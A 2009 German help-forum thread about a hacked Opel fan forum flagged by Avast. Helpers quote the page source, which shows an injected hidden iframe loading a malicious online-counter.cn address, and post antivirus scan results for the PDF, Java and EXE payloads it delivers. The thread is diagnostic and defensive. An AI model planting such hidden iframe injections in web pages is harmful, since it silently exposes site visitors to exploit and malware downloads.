Trojaner auf mein Forum ???

Killerman · 18.11.2009, 09:33

Hallo,

habe bei mir Avast installiert mit dem Web Schutz und wenn ich jetzt auf mein Forum gehen will:

h*tp://www.rüsselsheimer-edition.de

kommt immer die Info:

Das ein Trojanisches Pferd gefunden wurde HTML:IFrame-JZ [Trj] und das er die Seite trennt.

Was kann ich machen habe da leider keine Ahnung was ich machen könnte.

Danke euch.

Killerman · 13.12.2009, 01:41

Kann mir keiner weiterhelfen?

Killerman · 17.12.2009, 12:41

Glaube das Forum ist Tot da keiner mir Hilfe gibt....

KarlKarl · 19.12.2009, 23:01

Und wenn Du direkt auf http://www.rüsselsheimer-edition.de/jgs_portal.php gehst und die dumme Vorschaltseite weglässt? Die ist nämlich die einzige wo ich einen Iframe entdeckt habe.

timo.beil · 20.12.2009, 00:00

Zitat:

Zitat von Killerman

Glaube das Forum ist Tot da keiner mir Hilfe gibt....

Tss...

Wenn du dir mal die Mühe gemacht hättest und den Quellcode deiner Seite angeschaut hättest, dann wäre dir schnell aufgefallen:

Code:

ATTFilter

<body> 
<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><div style="display:none"><iframe src="***//online-counter.cn/stats/189/****" width="72" height="405"></iframe></div><!--sdjfh8y234jhdsf8340r-->
<p>&nbsp;</p>

Dieser IFrame is wohl mal ein Counter gewesen. Jetzt kommt der Clou:

Zitat:

Als attackierend gemeldete Website!

Die Website auf online-counter.cn wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.

Damit wäre das ganze gelöst

Killerman · 20.12.2009, 00:00

Was meinst du mit Vorschaltseite?

LG Mario

timo.beil · 20.12.2009, 00:01

Zitat:

Zitat von Killerman

Was meinst du mit Vorschaltseite?

LG Mario

Deine Vorschaltseite:

Zitat:

Wenn die automatische Weiterleitung nicht funktioniert, bitte hier klicken!

Mehr?

Code:

ATTFilter

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>rüsselsheimer-edition</title>
<meta http-equiv="refresh" content="0; URL=./jgs_portal.php">
<meta http-equiv="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta http-equiv="Language" CONTENT="de">
<meta name="page-topic" content="Das Thema meines Forums"> 
<meta name="description" content="Das hier ist ein ganz dolles Forum!">
<meta name="keywords" content="Forum WBB labern tratschen BBS">
</head>
<body> 
<!-- hJTYsX hwZrh TpA gJK LhdIvzPX --><div style="display:none"><iframe src="***online-counter.cn/stats/189/index.php" width="72" height="405"></iframe></div><!--sdjfh8y234jhdsf8340r-->
<p>&nbsp;</p>
<p>&nbsp;</p>

<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<center>
<font face="verdana"><a href=".http://www.rüsselsheimer-edition.de/jgs_portal.php">Wenn die automatische
Weiterleitung nicht funktioniert, bitte hier klicken!</a></font><br>
</center>
</body>
</html>

KarlKarl · 20.12.2009, 00:29

Vorhin habe ich es ja noch akzeptiert, dass da ein Counter auf einer chinesischen Seite eingesetzt wird. Jetzt habe ich mir den mal genauer angesehen und da tauchen weitere Iframes auf, ein sehr seltsames PDF,

Code:

ATTFilter

a-squared	4.5.0.43	2009.12.19	-
AhnLab-V3	5.0.0.2	2009.12.19	JS/Exploit
AntiVir	7.9.1.114	2009.12.18	-
Antiy-AVL	2.0.3.7	2009.12.18	-
Authentium	5.2.0.5	2009.12.02	-
Avast	4.8.1351.0	2009.12.19	-
AVG	8.5.0.427	2009.12.19	-
BitDefender	7.2	2009.12.19	-
CAT-QuickHeal	10.00	2009.12.19	-
Comodo	3301	2009.12.19	-
DrWeb	5.0.0.12182	2009.12.19	-
eSafe	7.0.17.0	2009.12.16	-
eTrust-Vet	35.1.7185	2009.12.19	-
F-Prot	4.5.1.85	2009.12.19	-
F-Secure	9.0.15370.0	2009.12.19	-
Fortinet	4.0.14.0	2009.12.19	-
GData	19	2009.12.19	-
Ikarus	T3.1.1.79.0	2009.12.19	-
Jiangmin	13.0.900	2009.12.19	-
K7AntiVirus	7.10.923	2009.12.17	-
Kaspersky	7.0.0.125	2009.12.20	Exploit.JS.Pdfka.auf
McAfee	5837	2009.12.19	Exploit-PDF.ac
McAfee+Artemis	5837	2009.12.19	Exploit-PDF.ac
McAfee-GW-Edition	6.8.5	2009.12.19	-
Microsoft	1.5302	2009.12.19	Exploit:Win32/Pdfjsc.CM
NOD32	4702	2009.12.19	-
Norman	6.04.03	2009.12.19	-
nProtect	2009.1.8.0	2009.12.18	-
Panda	10.0.2.2	2009.12.15	-
PCTools	7.0.3.5	2009.12.19	-
Prevx	3.0	2009.12.20	-
Rising	22.26.05.04	2009.12.19	Hack.Exploit.PDF.e
Sophos	4.49.0	2009.12.19	-
Sunbelt	3.2.1858.2	2009.12.19	Exploit.PDF-JS.Gen (v)
Symantec	1.4.4.12	2009.12.19	-
TheHacker	6.5.0.2.099	2009.12.19	-
TrendMicro	9.100.0.1001	2009.12.19	-
VBA32	3.12.12.0	2009.12.19	-
ViRobot	2009.12.18.2097	2009.12.18	-
VirusBuster	5.0.21.0	2009.12.19	-

Java

Code:

ATTFilter

a-squared	4.5.0.43	2009.12.19	-
AhnLab-V3	5.0.0.2	2009.12.19	-
AntiVir	7.9.1.114	2009.12.18	-
Antiy-AVL	2.0.3.7	2009.12.18	Trojan/Java.Agent
Authentium	5.2.0.5	2009.12.02	-
Avast	4.8.1351.0	2009.12.19	-
AVG	8.5.0.427	2009.12.19	Downloader.Generic_c.AVI
BitDefender	7.2	2009.12.19	-
CAT-QuickHeal	10.00	2009.12.19	-
ClamAV	0.94.1	2009.12.19	-
Comodo	3301	2009.12.19	-
DrWeb	5.0.0.12182	2009.12.19	-
eSafe	7.0.17.0	2009.12.16	-
eTrust-Vet	35.1.7185	2009.12.19	-
F-Prot	4.5.1.85	2009.12.19	-
F-Secure	9.0.15370.0	2009.12.19	Trojan-Downloader:W32/Small.HDR
Fortinet	4.0.14.0	2009.12.19	-
GData	19	2009.12.19	-
Ikarus	T3.1.1.79.0	2009.12.19	Trojan-Downloader.Java.Agent
Jiangmin	13.0.900	2009.12.19	-
K7AntiVirus	7.10.923	2009.12.17	-
Kaspersky	7.0.0.125	2009.12.20	Trojan-Downloader.Java.Agent.af
McAfee	5837	2009.12.19	-
McAfee+Artemis	5837	2009.12.19	-
McAfee-GW-Edition	6.8.5	2009.12.19	-
Microsoft	1.5302	2009.12.19	TrojanDownloader:Java/Rexec.A
NOD32	4702	2009.12.19	-
Norman	6.04.03	2009.12.19	-
nProtect	2009.1.8.0	2009.12.18	-
Panda	10.0.2.2	2009.12.15	-
PCTools	7.0.3.5	2009.12.19	-
Prevx	3.0	2009.12.20	-
Rising	22.26.05.04	2009.12.19	-
Sophos	4.49.0	2009.12.19	Troj/ClsLdr-S
Sunbelt	3.2.1858.2	2009.12.19	-
Symantec	1.4.4.12	2009.12.19	-
TheHacker	6.5.0.2.099	2009.12.19	-
TrendMicro	9.100.0.1001	2009.12.19	-
VBA32	3.12.12.0	2009.12.19	-
ViRobot	2009.12.18.2097	2009.12.18	-
VirusBuster	5.0.21.0	2009.12.19	-

und EXE

Code:

ATTFilter

a-squared	4.5.0.43	2009.12.19	Trojan.Win32.Chksyn!IK
AhnLab-V3	5.0.0.2	2009.12.19	-
AntiVir	7.9.1.114	2009.12.18	TR/Crypt.ZPACK.Gen
Antiy-AVL	2.0.3.7	2009.12.18	-
Authentium	5.2.0.5	2009.12.02	-
Avast	4.8.1351.0	2009.12.19	Win32:Malware-gen
AVG	8.5.0.427	2009.12.19	Generic16.BQU
BitDefender	7.2	2009.12.19	Trojan.Generic.2870040
CAT-QuickHeal	10.00	2009.12.19	Worm.Rimecud.A
ClamAV	0.94.1	2009.12.19	-
Comodo	3301	2009.12.19	TrojWare.Win32.Trojan.Agent.Gen
DrWeb	5.0.0.12182	2009.12.19	Trojan.Packed.688
eSafe	7.0.17.0	2009.12.16	-
eTrust-Vet	35.1.7185	2009.12.19	-
F-Prot	4.5.1.85	2009.12.19	-
F-Secure	9.0.15370.0	2009.12.19	Worm:W32/Palevo.gen!I
Fortinet	4.0.14.0	2009.12.19	-
GData	19	2009.12.19	Trojan.Generic.2870040
Ikarus	T3.1.1.79.0	2009.12.19	Trojan.Win32.Chksyn
K7AntiVirus	7.10.923	2009.12.17	-
Kaspersky	7.0.0.125	2009.12.20	Trojan.Win32.Swisyn.snv
McAfee	5837	2009.12.19	-
McAfee+Artemis	5837	2009.12.19	Artemis!215055F7D0E9
McAfee-GW-Edition	6.8.5	2009.12.19	Trojan.Crypt.ZPACK.Gen
Microsoft	1.5302	2009.12.19	Trojan:Win32/Chksyn.gen!A
NOD32	4702	2009.12.19	-
Norman	6.04.03	2009.12.19	-
nProtect	2009.1.8.0	2009.12.18	-
Panda	10.0.2.2	2009.12.15	-
PCTools	7.0.3.5	2009.12.19	Trojan.Generic
Prevx	3.0	2009.12.20	-
Rising	22.26.05.04	2009.12.19	-
Sophos	4.49.0	2009.12.19	Mal/EncPk-MX
Sunbelt	3.2.1858.2	2009.12.19	-
Symantec	1.4.4.12	2009.12.19	Trojan Horse
TheHacker	6.5.0.2.099	2009.12.19	-
TrendMicro	9.100.0.1001	2009.12.19	-
VBA32	3.12.12.0	2009.12.19	Trojan.Win32.Swisyn.snv
ViRobot	2009.12.18.2097	2009.12.18	-
VirusBuster	5.0.21.0	2009.12.19	-

will dieser Counter auch auf das System laden. Avast liegt da ganz richtig liegt und ist allen Opel-Fans zu empfehlen, wenn die lieber an ihrem Opel schrauben als ihr System neu aufsetzen wollen.

Für dich heißt das, dass dein Server kompromittiert ist und neu aufgesetzt gehört. Diese Antikversion des Burning Boards noch zu nutzen ist so sicher wie Windows ohne Servicepacks.

Alles Klar ?

19.12.2009, 23:01	#4
KarlKarl /// Helfer-Team	Trojaner auf mein Forum ??? Und wenn Du direkt auf http://www.rüsselsheimer-edition.de/jgs_portal.php gehst und die dumme Vorschaltseite weglässt? Die ist nämlich die einzige wo ich einen Iframe entdeckt habe.

Trojaner auf mein Forum ???

Plagegeister aller Art und deren Bekämpfung: Trojaner auf mein Forum ???